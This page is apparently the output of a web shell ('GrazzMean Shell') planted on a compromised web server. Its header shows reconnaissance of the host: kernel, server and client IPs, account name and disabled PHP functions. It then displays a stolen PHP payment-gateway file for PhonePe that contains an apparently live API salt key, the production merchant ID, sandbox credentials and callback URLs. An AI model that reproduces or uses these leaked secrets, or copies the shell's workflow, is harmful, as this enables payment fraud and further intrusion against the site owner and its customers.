shell bypass 403

GrazzMean Shell

Uname: Linux server.thebazaar99.com 5.14.0-687.17.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jun 22 07:21:26 EDT 2026 x86_64
Software: Apache
PHP version: 8.3.32 [ PHP INFO ] PHP os: Linux
Server Ip: 163.227.92.254
Your Ip: 216.73.217.24
User: gutlooks (1003) | Group: gutlooks (1005)
Safe Mode: OFF
Disable Function:
exec,passthru,shell_exec,system

name : phone_pay_gateway.php
<?php
//function autoload
        spl_autoload_register(function($class) {
  include("../admin_login/classess/".$class.".php");
});
        
        $sqlfun = new sqlfunction();
        $admin = new admin_login();
        //  $utc_datetime = date("Y-m-d H:i:s");
        //  $p_id = "1";
        //  $amount = "1";
        //     echo $transaction_id = strtotime($utc_datetime)."S".$p_id."S".$amount;
            date_default_timezone_set('Asia/Kolkata');
           
                    $utc_datetime = date("Y-m-d H:i:s");
                  
                    $p_id = "2";
                    $name = "test";
                    $mobile = "9089786756";
                    $amount = "100";
                    
                  
                            
                                        $transaction_id = strtotime($utc_datetime)."S".$p_id."S".$amount;
                                        // $datas = array(
                                        //     "date" =>date("Y-m-d"),
                                        //     "player_id" =>$p_id,
                                        //     "p_name" =>$name,
                                        //     "p_mobile" =>$mobile,
                                        //     "amount" =>$amount,
                                        //     "time" =>date("H:i"),
                                        //     "transaction_id" =>$transaction_id,
                                        //     //"screenshot"=>"https://matkakingonline.co.in/screenshot/".$image_filename,
                                        //     "status" =>"Pending",
                                        //     );
                                            
                                           
                                            
                                            // if($bonus_minimum_amnt <= $amount){
                                            //     if($bonus_setting == "yes"){
                                            //         $bonus_amount = ceil($amount * $bonus_percentage/100);
                                            //         $datas['bonus'] = $bonus_amount;
                                            //     }
                                            // }
                                            
                                            // $check_setting = $sqlfun->query("select ");
                                            ////////////////////////
                                            
                                            
                                            /////////////////////////
                                       
        

      $apikey= "ab0b1ce5-bd3f-490a-bfc1-35a36e42e10a";//ab0b1ce5-bd3f-490a-bfc1-35a36e42e10a
     // Step 1: Create the JSON payload with a custom parameter
    $payload = array(
    "merchantId" => "M22D5LIYNKQMF",//Live mID - M22D5LIYNKQMF,
    "merchantTransactionId" => $transaction_id,
    "merchantUserId" => rand(),
    "amount" =>  $amount*100,
    "redirectUrl" => 'https://www.gutlooks.com/myphonepe/redirect.php',
    "redirectMode" => "POST",
    "callbackUrl" => 'https://www.gutlooks.com/myphonepe/callback.php',
    "mobileNumber" => $mobile,
//     "deviceContext"=> array(
//     "deviceOS"=> "ANDROID"
//   ),
    "paymentInstrument" => array(
    "type" => "PAY_PAGE",
    ),
    // "customParam" => "hy" // Add your custom parameter here
);
// print_r($payload); die;
// Step 2: Convert the JSON payload to Base64
$jsonPayload = json_encode($payload);
 $base64Payload = base64_encode($jsonPayload);
 
 
 //
 $salt_index = 1; //key index 1
$payload1 = $base64Payload . "/pg/v1/pay" . $apikey;
$sha256 = hash("sha256", $payload1);
$final_x_header = $sha256 . '###' . $salt_index;
 //

// Step 3: Construct the final request payload
$request = json_encode(array(
    "request" => $base64Payload
));


// MID: PHONEPETESTUAT
// saltKey: 56c43115-7eda-40ce-a6e1-43339fbbf07c,
// saltIndex: 1
// https://api-preprod.phonepe.com/apis/pg-sandbox/pg/v1/pay
// mgk-rjuf-ghx



$curl = curl_init();
curl_setopt_array($curl, [
    CURLOPT_URL => "https://api.phonepe.com/apis/hermes/pg/v1/pay",  //prod host url
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_ENCODING => "",
    CURLOPT_MAXREDIRS => 10,
    CURLOPT_TIMEOUT => 30,
    CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
    CURLOPT_CUSTOMREQUEST => "POST",
    CURLOPT_POSTFIELDS => $request,
    CURLOPT_HTTPHEADER => [
        "Content-Type: application/json",
        "X-VERIFY: " . $final_x_header,
        "accept: application/json"
    ],
]);

 echo $response = curl_exec($curl);
$err = curl_error($curl);

curl_close($curl);

if ($err) {
    echo "cURL Error #:" . $err;
} else {
    $res = json_decode($response);
    //print_r($res);
    // if (isset($res->success) && $res->success == '1') {
    //     $paymentCode = $res->code;
    //     $paymentMsg = $res->message;
    //     $payUrl = $res->data->instrumentResponse->redirectInfo->url;
    // }

    // 	header("Location:$payUrl");
    	//echo json_encode(array("url"=>$payUrl));
    
     }
    
                                   
                                    
                                                
                        // }
                        // else
                        // {
                        //     $data = array("res"=>"failure","msg" =>"Invalid credentials"); 
                        // }
                            
                            
                // }else{
                    
                //             $data = array("res"=>"failure","msg" =>"Invalid credentials 1");
                // }
                // echo json_encode($data);
        ?>
© 2026 GrazzMean